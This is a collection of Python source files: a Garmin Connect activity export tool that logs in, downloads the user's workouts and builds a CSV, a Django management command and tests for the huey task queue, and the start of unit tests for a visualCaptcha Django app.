{
"source": "jedie/Garmin-Connect-Export-1",
"score": 3
}
#### File: jedie/Garmin-Connect-Export-1/gceaccess.py
```python
import http.cookiejar
import json
import logging
import re
import urllib.error
import urllib.parse
import urllib.request
import gceutils
log = logging.getLogger(__name__)
LIMIT_MAXIMUM = 1000
def query_garmin_stats():
log.debug("Getting display name and user stats via: " + URL_GC_PROFILE)
profile_page = http_req(URL_GC_PROFILE).decode()
# write_to_file(args.directory + '/profile.html', profile_page, 'a')
# extract the display name from the profile page, it should be in there as
# \"displayName\":\"eschep\"
pattern = re.compile(
r".*\\\"displayName\\\":\\\"([-.\w]+)\\\".*", re.MULTILINE | re.DOTALL
)
match = pattern.match(profile_page)
if not match:
raise Exception("Did not find the display name in the profile page.")
display_name = match.group(1)
log.info("displayName=" + display_name)
log.info(URL_GC_USERSTATS + display_name)
user_stats = http_req(URL_GC_USERSTATS + display_name)
log.debug("Finished display name and user stats ~~~~~~~~~~~~~~~~~~~~~~~~~~~")
return user_stats
def download_data(download_url, formattype):
# Download the data file from Garmin Connect. If the download fails (e.g., due to timeout),
# this script will die, but nothing will have been written to disk about this activity, so
# just running it again should pick up where it left off.
log.info("\tDownloading file...")
data = ""
try:
data = http_req(download_url)
except urllib.error.HTTPError as errs:
# Handle expected (though unfortunate) error codes; die on unexpected ones.
if errs.code == 500 and formattype == "tcx":
# Garmin will give an internal server error (HTTP 500) when downloading TCX files
# if the original was a manual GPX upload. Writing an empty file prevents this file
# from being redownloaded, similar to the way GPX files are saved even when there
# are no tracks. One could be generated here, but that's a bit much. Use the GPX
# format if you want actual data in every file, as I believe Garmin provides a GPX
# file for every activity.
log.info("\t\tWriting empty file since Garmin did not generate a TCX file for this activity...")
data = ""
elif errs.code == 404 and formattype == "original":
# For manual activities (i.e., entered in online without a file upload), there is
# no original file. # Write an empty file to prevent redownloading it.
log.info("\t\tWriting empty file since there was no original activity data...")
data = ""
else:
# Re-raise outside a finally block; a "return" in finally would swallow this exception.
raise Exception("Failed. Got an unexpected HTTP error (" + str(errs.code) + ") for: " + download_url)
return data
def gclogin(username, password):
# DATA = gceaccess.builddata()
# log.debug(urllib.parse.urlencode(DATA))
# Initially, we need to get a valid session cookie, so we pull the login page.
log.debug("Request login page")
http_req(URL_GC_LOGIN)
log.debug("Finish login page")
# Now we'll actually login.
# Fields that are passed in a typical Garmin login.
post_data = {
"username": username,
"password": password,
"embed": "false",
"rememberme": "on",
}
headers = {"referer": URL_GC_LOGIN}
log.debug("Post login data")
login_response = http_req(URL_GC_LOGIN + "#", post_data, headers).decode()
log.debug("Finish login post")
# extract the ticket from the login response
pattern = re.compile(r".*\?ticket=([-\w]+)\";.*", re.MULTILINE | re.DOTALL)
match = pattern.match(login_response)
if not match:
log.debug("the pattern and match do not match")
log.debug("login response = " + str(login_response))
raise Exception(
"Did not get a ticket in the login response. Cannot log in. "
"Did you enter the correct username and password?"
)
login_ticket = match.group(1)
log.debug("Login ticket=" + login_ticket)
log.debug("Request authentication URL: " + URL_GC_POST_AUTH + "ticket=" + login_ticket)
# login to garmin
http_req(URL_GC_POST_AUTH + "ticket=" + login_ticket)
log.debug("Finished authentication")
def http_req(url, post=None, headers=None):
"""Helper function that makes the HTTP requests."""
request = urllib.request.Request(url)
# Tell Garmin we're some supported browser.
request.add_header(
"User-Agent",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 "
"(KHTML, like Gecko) Chrome/54.0.2816.0 Safari/537.36",
)
if headers:
for header_key, header_value in headers.items():
request.add_header(header_key, header_value)
if post:
# Convert the dictionary to a URL-encoded UTF-8 byte string for the POST body.
post = urllib.parse.urlencode(post).encode("utf-8")
# print("request.headers: " + str(request.headers) + " COOKIE_JAR: " + str(COOKIE_JAR))
# print("post: " + str(post) + "request: " + str(request))
response = OPENER.open(request, data=post)
if response.getcode() == 204:
# For activities without GPS coordinates, there is no GPX download (204 = no content).
# Write an empty file to prevent redownloading it.
log.info("Writing empty file since there was no GPX activity data...")
return ""
elif response.getcode() != 200:
raise Exception("Bad return code (" + str(response.getcode()) + ") for: " + url)
# print(response.getcode())
return response.read()
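# Minimal usage sketch of http_req (illustrative only):
#   raw = http_req(URL_GC_PROFILE)   # returns bytes (or "" for a 204 response)
#   page = raw.decode()              # GPX/TCX/JSON/HTML payloads are UTF-8 text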
def createjson(directory, stractId, actsum):
json_summary = json.loads(actsum)
log.debug(json_summary)
log.debug("Device detail URL: " + URL_DEVICE_DETAIL
+ str(json_summary["metadataDTO"]["deviceApplicationInstallationId"]))
device_detail = http_req(
URL_DEVICE_DETAIL
+ str(json_summary["metadataDTO"]["deviceApplicationInstallationId"])
)
if device_detail:
gceutils.write_to_file(
directory + "/" + stractId + "_app_info.json",
device_detail.decode(), "a",
)
json_device = json.loads(device_detail)
log.debug(json_device)
else:
log.debug("Retrieving Device Details failed.")
json_device = None
log.debug("Activity details URL: " + URL_GC_ACTIVITY + stractId + "/details")
try:
activity_detail = http_req(
URL_GC_ACTIVITY + stractId + "/details"
)
gceutils.write_to_file(
directory + "/" + stractId + "_activity_detail.json",
activity_detail.decode(), "a",
)
json_detail = json.loads(activity_detail)
log.debug(json_detail)
except Exception as error:
print("Retrieving Activity Details failed. Reason: " + str(error))
json_detail = None
log.debug("Gear details URL: " + URL_GEAR_DETAIL + "activityId=" + stractId)
gear_detail = http_req(URL_GEAR_DETAIL + "activityId=" + stractId)
try:
gceutils.write_to_file(directory + "/" + stractId + "_gear_detail.json",
gear_detail.decode(),
"a", )
json_gear = json.loads(gear_detail)
log.debug(json_gear)
except Exception as error:
print("Retrieving Gear Details failed. Error: " + str(error))
json_gear = None
return json_summary, json_gear, json_device, json_detail
def buildcsvrecord(a, json_summary, json_gear, json_device, json_detail):
# Write stats to CSV.
empty_record = ","
csv_record = ""
csv_record += (
empty_record
if "activityName" not in a or not a["activityName"]
else '"' + a["activityName"].replace('"', '""') + '",'
)
# The description field may be absent or explicitly null, so handle both cases.
if "description" not in a:
csv_record += empty_record
elif a["description"] is not None:
csv_record += '"' + a["description"].replace('"', '""') + '",'
else:
csv_record += empty_record
# Gear detail is returned as an array, so pick the first entry.
csv_record += (
empty_record
if not json_gear or "customMakeModel" not in json_gear[0]
else json_gear[0]["customMakeModel"] + ","
)
csv_record += (
empty_record
if "startTimeLocal" not in json_summary["summaryDTO"]
else '"' + json_summary["summaryDTO"]["startTimeLocal"] + '",'
)
csv_record += (
empty_record
if "elapsedDuration" not in json_summary["summaryDTO"]
else gceutils.hhmmss_from_seconds(json_summary["summaryDTO"]["elapsedDuration"]) + ","
)
csv_record += (
empty_record
if "movingDuration" not in json_summary["summaryDTO"]
else gceutils.hhmmss_from_seconds(json_summary["summaryDTO"]["movingDuration"]) + ","
)
csv_record += (
empty_record
if "distance" not in json_summary["summaryDTO"]
else "{0:.5f}".format(json_summary["summaryDTO"]["distance"] / 1000) + ","
)
csv_record += (
empty_record
if "averageSpeed" not in json_summary["summaryDTO"]
else gceutils.kmh_from_mps(json_summary["summaryDTO"]["averageSpeed"]) + ","
)
csv_record += (
empty_record
if "averageMovingSpeed" not in json_summary["summaryDTO"]
else gceutils.kmh_from_mps(json_summary["summaryDTO"]["averageMovingSpeed"]) + ","
)
csv_record += (
empty_record
if "maxSpeed" not in json_summary["summaryDTO"]
else gceutils.kmh_from_mps(json_summary["summaryDTO"]["maxSpeed"]) + ","
)
csv_record += (
empty_record
if "elevationLoss" not in json_summary["summaryDTO"]
else str(json_summary["summaryDTO"]["elevationLoss"]) + ","
)
csv_record += (
empty_record
if "elevationGain" not in json_summary["summaryDTO"]
else str(json_summary["summaryDTO"]["elevationGain"]) + ","
)
csv_record += (
empty_record
if "minElevation" not in json_summary["summaryDTO"]
else str(json_summary["summaryDTO"]["minElevation"]) + ","
)
csv_record += (
empty_record
if "maxElevation" not in json_summary["summaryDTO"]
else str(json_summary["summaryDTO"]["maxElevation"]) + ","
)
csv_record += empty_record if "minHR" not in json_summary["summaryDTO"] else ","
csv_record += (
empty_record
if "maxHR" not in json_summary["summaryDTO"]
else str(json_summary["summaryDTO"]["maxHR"]) + ","
)
csv_record += (
empty_record
if "averageHR" not in json_summary["summaryDTO"]
else str(json_summary["summaryDTO"]["averageHR"]) + ","
)
csv_record += (
empty_record
if "calories" not in json_summary["summaryDTO"]
else str(json_summary["summaryDTO"]["calories"]) + ","
)
csv_record += (
empty_record
if "averageBikeCadence" not in json_summary["summaryDTO"]
else str(json_summary["summaryDTO"]["averageBikeCadence"]) + ","
)
csv_record += (
empty_record
if "maxBikeCadence" not in json_summary["summaryDTO"]
else str(json_summary["summaryDTO"]["maxBikeCadence"]) + ","
)
csv_record += (
empty_record
if "totalNumberOfStrokes" not in json_summary["summaryDTO"]
else str(json_summary["summaryDTO"]["totalNumberOfStrokes"]) + ","
)
csv_record += (
empty_record
if "averageTemperature" not in json_summary["summaryDTO"]
else str(json_summary["summaryDTO"]["averageTemperature"]) + ","
)
csv_record += (
empty_record
if "minTemperature" not in json_summary["summaryDTO"]
else str(json_summary["summaryDTO"]["minTemperature"]) + ","
)
csv_record += (
empty_record
if "maxTemperature" not in json_summary["summaryDTO"]
else str(json_summary["summaryDTO"]["maxTemperature"]) + ","
)
csv_record += (
empty_record
if "activityId" not in a
else '"https://connect.garmin.com/modern/activity/'
+ str(a["activityId"])
+ '",'
)
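# The timestamp columns below (and the corrected-elevation columns further down)
# are always written as empty cells; only the key's presence is checked.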
csv_record += (
empty_record if "endTimestamp" not in json_summary["summaryDTO"] else ","
)
csv_record += (
empty_record if "beginTimestamp" not in json_summary["summaryDTO"] else ","
)
csv_record += (
empty_record if "endTimestamp" not in json_summary["summaryDTO"] else ","
)
csv_record += (
empty_record
if not json_device or "productDisplayName" not in json_device
else json_device["productDisplayName"] + " " + json_device["versionString"] + ","
)
csv_record += (
empty_record
if "activityType" not in a
else a["activityType"]["typeKey"].title() + ","
)
csv_record += (
empty_record
if "eventType" not in a
else a["eventType"]["typeKey"].title() + ","
)
csv_record += (
empty_record
if "timeZoneUnitDTO" not in json_summary
else json_summary["timeZoneUnitDTO"]["timeZone"] + ","
)
csv_record += (
empty_record
if "startLatitude" not in json_summary["summaryDTO"]
else str(json_summary["summaryDTO"]["startLatitude"]) + ","
)
csv_record += (
empty_record
if "startLongitude" not in json_summary["summaryDTO"]
else str(json_summary["summaryDTO"]["startLongitude"]) + ","
)
csv_record += (
empty_record
if "endLatitude" not in json_summary["summaryDTO"]
else str(json_summary["summaryDTO"]["endLatitude"]) + ","
)
csv_record += (
empty_record
if "endLongitude" not in json_summary["summaryDTO"]
else str(json_summary["summaryDTO"]["endLongitude"]) + ","
)
csv_record += (
empty_record
if "gainCorrectedElevation" not in json_summary["summaryDTO"]
else ","
)
csv_record += (
empty_record
if "lossCorrectedElevation" not in json_summary["summaryDTO"]
else ","
)
csv_record += (
empty_record
if "maxCorrectedElevation" not in json_summary["summaryDTO"]
else ","
)
csv_record += (
empty_record
if "minCorrectedElevation" not in json_summary["summaryDTO"]
else ","
)
csv_record += (
empty_record
if not json_detail or "metricsCount" not in json_detail
else str(json_detail["metricsCount"]) + ","
)
csv_record += "\n"
return csv_record
def csvheader():
# Use implicit string concatenation so no stray whitespace ends up in the header.
header = (
"Activity name,"
"Description,"
"Bike,"
"Begin timestamp,"
"Duration (h:m:s),"
"Moving duration (h:m:s),"
"Distance (km),"
"Average speed (km/h),"
"Average moving speed (km/h),"
"Max. speed (km/h),"
"Elevation loss uncorrected (m),"
"Elevation gain uncorrected (m),"
"Elevation min. uncorrected (m),"
"Elevation max. uncorrected (m),"
"Min. heart rate (bpm),"
"Max. heart rate (bpm),"
"Average heart rate (bpm),"
"Calories,"
"Avg. cadence (rpm),"
"Max. cadence (rpm),"
"Strokes,"
"Avg. temp (°C),"
"Min. temp (°C),"
"Max. temp (°C),"
"Map,"
"End timestamp,"
"Begin timestamp (ms),"
"End timestamp (ms),"
"Device,"
"Activity type,"
"Event type,"
"Time zone,"
"Begin latitude (°DD),"
"Begin longitude (°DD),"
"End latitude (°DD),"
"End longitude (°DD),"
"Elevation gain corrected (m),"
"Elevation loss corrected (m),"
"Elevation max. corrected (m),"
"Elevation min. corrected (m),"
"Sample count\n"
)
return header
COOKIE_JAR = http.cookiejar.CookieJar()
OPENER = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(COOKIE_JAR))
WEBHOST = "https://connect.garmin.com"
REDIRECT = "https://connect.garmin.com/modern/"
BASE_URL = "https://connect.garmin.com/en-US/signin"
SSO = "https://sso.garmin.com/sso"
CSS = "https://static.garmincdn.com/com.garmin.connect/ui/css/gauth-custom-v1.2-min.css"
DATA = {
"service": REDIRECT,
"webhost": WEBHOST,
"source": BASE_URL,
"redirectAfterAccountLoginUrl": REDIRECT,
"redirectAfterAccountCreationUrl": REDIRECT,
"gauthHost": SSO,
"locale": "en_US",
"id": "gauth-widget",
"cssUrl": CSS,
"clientId": "GarminConnect",
"rememberMeShown": "true",
"rememberMeChecked": "false",
"createAccountShown": "true",
"openCreateAccount": "false",
"displayNameShown": "false",
"consumeServiceTicket": "false",
"initialFocus": "true",
"embedWidget": "false",
"generateExtraServiceTicket": "true",
"generateTwoExtraServiceTickets": "false",
"generateNoServiceTicket": "false",
"globalOptInShown": "true",
"globalOptInChecked": "false",
"mobile": "false",
"connectLegalTerms": "true",
"locationPromptShown": "true",
"showPassword": "true",
}
# URLs for various services.
URL_GC_LOGIN = "https://sso.garmin.com/sso/signin?" + urllib.parse.urlencode(DATA)
URL_GC_POST_AUTH = "https://connect.garmin.com/modern/activities?"
URL_GC_PROFILE = "https://connect.garmin.com/modern/profile"
URL_GC_USERSTATS = "https://connect.garmin.com/modern/proxy/userstats-service/statistics/"
URL_GC_LIST = "https://connect.garmin.com/modern/proxy/activitylist-service/activities/search/activities?"
URL_GC_ACTIVITY = "https://connect.garmin.com/modern/proxy/activity-service/activity/"
URL_GC_GPX_ACTIVITY = "https://connect.garmin.com/modern/proxy/download-service/export/gpx/activity/"
URL_GC_TCX_ACTIVITY = "https://connect.garmin.com/modern/proxy/download-service/export/tcx/activity/"
URL_GC_ORIGINAL_ACTIVITY = "http://connect.garmin.com/proxy/download-service/files/activity/"
URL_DEVICE_DETAIL = "https://connect.garmin.com/modern/proxy/device-service/deviceservice/app-info/"
URL_GEAR_DETAIL = "https://connect.garmin.com/modern/proxy/gear-service/gear/filterGear?"
```
#### File: jedie/Garmin-Connect-Export-1/gceutils.py
```python
import logging
import os
import time
from datetime import timedelta
from os import mkdir
from os.path import isdir
from zipfile import ZipFile
####################################################################################################################
# Updates:
# rsjrny 13 May 2019 New file for universal functions
####################################################################################################################
log = logging.getLogger(__name__)
# Zip all files found under the given directory.
def zipfilesindir(dst, src):
"""
:param dst: full path with filename where the archive will be created
:param src: ARGS.directory - we will zip whatever is left in the directory
:return:
"""
log.debug("In zipfilesindir, preparing to archive all file in " + src)
# sleep to allow system to finish processing file. We don't want an inuse or not found error
time.sleep(3)
dirpart = os.path.dirname(dst)
if not isdir(dirpart):
mkdir(dirpart)
log.debug("Archive directory " + dirpart + "created")
# fname = os.path.basename(dst)
zf = ZipFile(dst, "w")
abs_src = os.path.abspath(src)
for dirname, subdirs, files in os.walk(src):
for filename in files:
absname = os.path.abspath(os.path.join(dirname, filename))
arcname = absname[len(abs_src) + 1:]
log.debug("zipping " + os.path.join(dirname, filename) + " as " + arcname)
zf.write(absname, arcname)
zf.close()
log.info("Archive created: " + dst)
def removefiles(dirname, dellist):
# loop thru all files in the directory
log.debug("In removefiles preparing to delete any unwanted files based on the --delete arg")
log.debug(" --delete arg = " + str(dellist))
for filename in os.listdir(dirname):
# split filename and extension.
fname, fext = os.path.splitext(filename)
# if this extension is in the delete list, delete the file
if fext in dellist:
filepath = os.path.join(dirname, filename)
log.debug("deleting: " + filepath)
os.remove(filepath)
time.sleep(3)
def kmh_from_mps(mps):
"""Helper function that converts meters per second (mps) to km/h."""
return str(mps * 3.6)
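# Example: kmh_from_mps(2.5) returns "9.0".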
def hhmmss_from_seconds(sec):
"""Helper function that converts seconds to HH:MM:SS time format."""
if isinstance(sec, (int, float)):
formatted_time = str(timedelta(seconds=int(sec))).zfill(8)
else:
formatted_time = "0.000"
return formatted_time
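# Example: hhmmss_from_seconds(3661.0) returns "01:01:01".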
def decoding_decider(formattype, data):
"""Helper function that decides if a decoding should happen or not."""
if formattype == "original":
# An original file (ZIP file) is binary, so leave it undecoded.
return data
if data:
# GPX and TCX are text files and UTF-8 encoded.
return data.decode()
return data
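# Example: decoding_decider("gpx", b"<gpx/>") returns "<gpx/>", while
# decoding_decider("original", zip_bytes) returns zip_bytes unchanged.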
def write_to_file(filename, content, mode):
"""Helper function that persists content to file."""
with open(filename, mode) as write_file:
write_file.write(content)
def printverbose(verarg, vermsg):
if verarg:
print(vermsg)
```
#### File: jedie/Garmin-Connect-Export-1/gcexport3.py
```python
import argparse
import json
import logging
import sys
import time
import urllib.parse
import urllib.request
import zipfile
from datetime import datetime
from getpass import getpass
from os import mkdir, remove, stat
from os.path import isdir, isfile
from subprocess import call
from sys import argv
from xml.dom.minidom import parseString
import gceaccess
import gceargs
import gceutils
log = logging.getLogger()
logging.basicConfig()
SCRIPT_VERSION = "1.0.0"
CURRENT_DATE = datetime.now().strftime("%Y-%m-%d")
ACTIVITIES_DIRECTORY = "./" + CURRENT_DATE + "_garmin_connect_export"
TOTAL_TO_DOWNLOAD = 0
TOTAL_DOWNLOADED = 0
TOTAL_SKIPPED = 0
TOTAL_RETRIEVED = 0
# define the ARGs
PARSER = argparse.ArgumentParser()
gceargs.addargs(PARSER, ACTIVITIES_DIRECTORY)
ARGS = PARSER.parse_args()
if ARGS.debug:
log.setLevel(logging.DEBUG)
if ARGS.version:
print(argv[0] + ", version " + SCRIPT_VERSION)
sys.exit(0)
USERNAME = ARGS.username if ARGS.username else input("Username: ")
PASSWORD = ARGS.password if ARGS.password else getpass()
def getallfiles():
# If the user wants to download all activities, query the userstats
# on the profile page to know how many are available
user_stats = gceaccess.query_garmin_stats()
# Persist JSON
gceutils.write_to_file(ARGS.directory + "/userstats.json", user_stats.decode(), "a")
# Modify total_to_download based on how many activities the server reports.
json_user = json.loads(user_stats)
return int(json_user["userMetrics"][0]["totalActivities"])
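# Sketch of the userstats JSON shape this relies on (other fields omitted):
#   {"userMetrics": [{"totalActivities": 123, ...}]}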
def downloadfile(actid):
"""
Download the file from the garmin site in the requested format. If the file already exists
in the directory the return value is 1 else the download url, filemode and filename are returned
:param actid:
:return:
"""
fitfilename = ""
tcxfilename = ""
gpxfilename = ""
if ARGS.format == "gpx":
datafilename = (ARGS.directory + "/" + actid + "_activity.gpx")
downloadurl = gceaccess.URL_GC_GPX_ACTIVITY + actid + "?full=true"
log.debug("DownloadURL: " + downloadurl)
filemode = "w"
elif ARGS.format == "tcx":
datafilename = (ARGS.directory + "/" + actid + "_activity.tcx")
downloadurl = gceaccess.URL_GC_TCX_ACTIVITY + actid + "?full=true"
log.debug("DownloadURL: " + downloadurl)
filemode = "w"
else:
# Some original downloads do not contain a .fit file; they may only hold an extracted
# gpx or tcx, so check for all types here.
datafilename = (ARGS.directory + "/" + actid + "_activity.zip")
fitfilename = (ARGS.directory + "/" + actid + ".fit")
tcxfilename = (ARGS.directory + "/" + actid + ".tcx")
gpxfilename = (ARGS.directory + "/" + actid + ".gpx")
downloadurl = gceaccess.URL_GC_ORIGINAL_ACTIVITY + actid
log.debug("DownloadURL: " + downloadurl)
filemode = "wb"
if ARGS.format != "original" and isfile(datafilename):
print("\tData file already exists; skipping...")
return 1, 1, 1
# Regardless of unzip setting, don't redownload if the ZIP or FIT file exists.
# some original files only contain tcx or gpx - check for all types before downloading
if ARGS.format == "original" \
and (isfile(datafilename)
or isfile(fitfilename)
or isfile(tcxfilename)
or isfile(gpxfilename)):
print("\tFIT data file already exists; skipping...")
return 1, 1, 1
return downloadurl, filemode, datafilename
def finalizefiles(data, data_filename):
"""
Finalize the datfile processing. If we are using format gpx see if we have tracks. If we are using
original and the unzip option was selected unzip the file and remove the original file
"""
if ARGS.format == "gpx" and data:
# Validate GPX data. If we have an activity without GPS data (e.g., running on a
# treadmill), Garmin Connect still kicks out a GPX (sometimes), but there is only
# activity information, no GPS data. N.B. You can omit the XML parse (and the
# associated log messages) to speed things up.
gpx = parseString(data)
if gpx.getElementsByTagName("trkpt"):
gceutils.printverbose(ARGS.verbose, "Done. GPX data saved.")
else:
gceutils.printverbose(ARGS.verbose, "Done. No track points found.")
elif ARGS.format == "original":
# Even a manually uploaded GPX file arrives zipped, but validate the extension anyway.
if ARGS.unzip and data_filename[-3:].lower() == "zip":
gceutils.printverbose(ARGS.verbose, "Unzipping and removing original files...")
try:
gceutils.printverbose(ARGS.verbose, "Filesize is: " + str(stat(data_filename).st_size))
except Exception as ferror:
print("Unable to determine file stats for " + data_filename + "Error: " + str(ferror))
return
if stat(data_filename).st_size > 0:
zip_file = open(data_filename, "rb")
z = zipfile.ZipFile(zip_file)
for name in z.namelist():
z.extract(name, ARGS.directory)
zip_file.close()
else:
gceutils.printverbose(ARGS.verbose, "Skipping 0Kb zip file.")
remove(data_filename)
gceutils.printverbose(ARGS.verbose, "Done, getting next file")
time.sleep(3)
else:
gceutils.printverbose(ARGS.verbose, "Done, getting next file.")
def processactivity(alist):
global TOTAL_SKIPPED, TOTAL_RETRIEVED
for a in alist:
# create a string from the activity to avoid having to use the str function multiple times.
stractid = str(a["activityId"])
# Display which entry we're working on.
print("Garmin Connect activity: [" + stractid + "] " + str(a["activityName"]))
# download the file from Garmin
download_url, file_mode, data_filename = downloadfile(stractid)
# if the file already existed go get the next file
if download_url == 1:
TOTAL_SKIPPED += 1
continue
# extract the data from the downloaded file
data = gceaccess.download_data(download_url, ARGS.format)
# if the original zip has no data
if data == "":
print("/tempty file, no data existed in the downloaded file")
continue
TOTAL_RETRIEVED += 1
# write the file
gceutils.write_to_file(data_filename, gceutils.decoding_decider(ARGS.format, data), file_mode)
log.debug("Activity summary URL: " + gceaccess.URL_GC_ACTIVITY + stractid)
# get the summary info, if unavailable go get next file
try:
activity_summary = gceaccess.http_req(gceaccess.URL_GC_ACTIVITY + stractid)
except Exception as aerror:
print("unable to get activity " + str(aerror))
continue
# write the summary file
gceutils.write_to_file(ARGS.directory + "/" + stractid + "_activity_summary.json",
activity_summary.decode(), "a", )
# build the json format files
json_summary, json_gear, json_device, json_detail = gceaccess.createjson(ARGS.directory,
stractid, activity_summary)
# CSV_FILE.write(csv_record)
CSV_FILE.write(gceaccess.buildcsvrecord(a, json_summary, json_gear, json_device, json_detail))
finalizefiles(data, data_filename)
print("Welcome to Garmin Connect Exporter!")
# Create directory for data files.
if isdir(ARGS.directory):
print(
"Warning: Output directory already exists. Will skip already-downloaded files and "
"append to the CSV file."
)
try:
gceaccess.gclogin(USERNAME, PASSWORD)
except Exception as error:
print(error)
sys.exit(8)
# create the activities directory if it is not there
if not isdir(ARGS.directory):
mkdir(ARGS.directory)
CSV_FILENAME = ARGS.directory + "/activities.csv"
CSV_EXISTED = isfile(CSV_FILENAME)
CSV_FILE = open(CSV_FILENAME, "a")
if not CSV_EXISTED:
CSV_FILE.write(gceaccess.csvheader())
if ARGS.count == "all":
TOTAL_TO_DOWNLOAD = getallfiles()
else:
TOTAL_TO_DOWNLOAD = int(ARGS.count)
print("Total to download: " + str(TOTAL_TO_DOWNLOAD))
# This while loop will download data from the server in multiple chunks, if necessary.
while TOTAL_DOWNLOADED < TOTAL_TO_DOWNLOAD:
# The server limits each request to LIMIT_MAXIMUM activities and rejects anything larger
# (historically HTTP 400; as of 2018-03-06 HTTP 500). So download the maximum, or
# whatever remains if less than the maximum.
if TOTAL_TO_DOWNLOAD - TOTAL_DOWNLOADED > gceaccess.LIMIT_MAXIMUM:
NUM_TO_DOWNLOAD = gceaccess.LIMIT_MAXIMUM
else:
NUM_TO_DOWNLOAD = TOTAL_TO_DOWNLOAD - TOTAL_DOWNLOADED
gceutils.printverbose(ARGS.verbose, "Number left to download = " + str(NUM_TO_DOWNLOAD))
search_parms = {"start": TOTAL_DOWNLOADED, "limit": NUM_TO_DOWNLOAD}
log.debug("Search parms" + str(search_parms))
# Query Garmin Connect
log.debug("Activity list URL: " + gceaccess.URL_GC_LIST + urllib.parse.urlencode(search_parms))
activity_list = gceaccess.http_req(gceaccess.URL_GC_LIST + urllib.parse.urlencode(search_parms))
gceutils.write_to_file(ARGS.directory + "/activity_list.json", activity_list.decode(), "a")
processactivity(json.loads(activity_list))
TOTAL_DOWNLOADED += NUM_TO_DOWNLOAD
# End while loop for multiple chunks.
CSV_FILE.close()
# delete the json and csv files before archiving. If requested
if ARGS.delete is not None:
print("deleting types " + str(ARGS.delete) + " from the output directory")
gceutils.removefiles(ARGS.directory, ARGS.delete)
# archive the downloaded files
if ARGS.archive:
print("archiving the downloaded files to: " + ARGS.archive)
gceutils.zipfilesindir(ARGS.archive, ARGS.directory)
# print the final counts
print("Total Requested...." + str(TOTAL_TO_DOWNLOAD))
print("Total Downloaded..." + str(TOTAL_RETRIEVED))
print("Total Skipped......" + str(TOTAL_SKIPPED))
# open the csv file in an external program if requested
if ARGS.external:
print("Open CSV output: " + CSV_FILENAME)
# open CSV file. Comment this line out if you don't want this behavior
call([ARGS.external, "--" + ARGS.args, CSV_FILENAME])
print("Done!")
```
{
"source": "jedie/huey",
"score": 2
}
#### File: management/commands/run_huey.py
```python
import imp
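# Note: the imp module is deprecated since Python 3.4; importlib is the modern replacement.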
import logging
from django.apps import apps as django_apps
from django.conf import settings
from django.core.management.base import BaseCommand
from huey.consumer import Consumer
from huey.consumer_options import ConsumerConfig
from huey.consumer_options import OptionParserHandler
logger = logging.getLogger(__name__)
class Command(BaseCommand):
"""
Queue consumer. Example usage::
To start the consumer (note you must export the settings module):
django-admin.py run_huey
"""
help = "Run the queue consumer"
_type_map = {'int': int, 'float': float}
def add_arguments(self, parser):
option_handler = OptionParserHandler()
groups = (
option_handler.get_logging_options(),
option_handler.get_worker_options(),
option_handler.get_scheduler_options(),
)
for option_list in groups:
for short, full, kwargs in option_list:
if short == '-v':
full = '--huey-verbose'
short = '-V'
if 'type' in kwargs:
kwargs['type'] = self._type_map[kwargs['type']]
kwargs.setdefault('default', None)
parser.add_argument(full, short, **kwargs)
def autodiscover(self):
"""Use Django app registry to pull out potential apps with tasks.py module."""
module_name = 'tasks'
for config in django_apps.get_app_configs():
app_path = config.module.__path__
try:
fp, path, description = imp.find_module(module_name, app_path)
except ImportError:
continue
else:
import_path = '%s.%s' % (config.name, module_name)
try:
imp.load_module(import_path, fp, path, description)
except ImportError:
logger.exception('Found "%s" but error raised attempting '
'to load module.', import_path)
def handle(self, *args, **options):
from huey.contrib.djhuey import HUEY
consumer_options = {}
try:
if isinstance(settings.HUEY, dict):
consumer_options.update(settings.HUEY.get('consumer', {}))
except AttributeError:
pass
for key, value in options.items():
if value is not None:
consumer_options[key] = value
consumer_options.setdefault('verbose',
consumer_options.pop('huey_verbose', None))
self.autodiscover()
config = ConsumerConfig(**consumer_options)
config.validate()
config.setup_logger()
consumer = Consumer(HUEY, **config.values)
consumer.run()
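# A minimal sketch (illustrative, not taken from this repo) of the settings.HUEY
# dict whose 'consumer' section handle() merges with the command-line options:
#
#   HUEY = {
#       'name': 'my-app',
#       'consumer': {'workers': 4, 'worker_type': 'thread'},
#   }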
```
#### File: huey/tests/test_simple.py
```python
import datetime
import sys
import unittest
from huey.contrib.simple_storage import SimpleHuey
from huey.tests.base import BaseTestCase
huey = SimpleHuey()
@huey.task()
def add_numbers(a, b):
return a + b
class TestSimpleHuey(BaseTestCase):
def setUp(self):
huey.storage.flush_all()
def test_queue(self):
res = add_numbers(1, 2)
task = huey.dequeue()
self.assertEqual(huey.execute(task), 3)
self.assertEqual(res.get(), 3)
def test_schedule(self):
ts = datetime.datetime.now().replace(microsecond=0)
make_eta = lambda s: ts + datetime.timedelta(seconds=s)
res1 = add_numbers.schedule((1, 2), eta=make_eta(4), convert_utc=False)
res2 = add_numbers.schedule((2, 3), eta=make_eta(2), convert_utc=False)
self.assertEqual(len(huey), 2)
r = huey.dequeue()
huey.add_schedule(r)
huey.add_schedule(huey.dequeue())
scheduled = huey.read_schedule(make_eta(1))
self.assertEqual(len(scheduled), 0)
scheduled = huey.read_schedule(make_eta(2))
self.assertEqual(len(scheduled), 1)
task, = scheduled
self.assertEqual(huey.execute(task), 5)
self.assertEqual(res2.get(), 5)
scheduled = huey.read_schedule(make_eta(4))
self.assertEqual(len(scheduled), 1)
task, = scheduled
self.assertEqual(huey.execute(task), 3)
self.assertEqual(res1.get(), 3)
if __name__ == '__main__':
unittest.main(argv=sys.argv)
```
{
"source": "JediKnightChan/visualCaptcha-django",
"score": 3
}
#### File: JediKnightChan/visualCaptcha-django/test.py
```python
import os
import sys
import unittest
import json
from django.test.client import Client
client = {}
frontendData = {}
# Runs before each test
def globalSetup():
global client
# Set a new "client" every time
client = Client()
# Test NonExisting routes
class NonExistingTest( unittest.TestCase ):
# Runs before each test in this group
def setUp( self ):
globalSetup()
# Should return 404 error when calling a non-existing route
def test_unexisting_test_route( self ):
response = client.get( '/test' )
self.assertEqual( response.status_code, 404 )
# Test Start routes
class StartTest( unittest.TestCase ):
# Runs before each test in this group
def setUp( self ):
globalSetup()
# Should return 404 error when calling /start without the number of requested images
def test_start_no_number_of_images( self ):
response = client.get( '/start' )
self.assertEqual( response.status_code, 404 )
# Should return 200 when calling /start/5, along with the image and audio field names, the image name, and the image values
def test_start_correct( self ):
global frontendData
response = client.get( '/start/5' )
self.assertEqual( response.status_code, 200 )
data = json.loads( response.content )
self.assertIsNotNone( data['imageName'] )
self.assertIsNotNone( data['imageFieldName'] )
self.assertIsNotNone( data['audioFieldName'] )
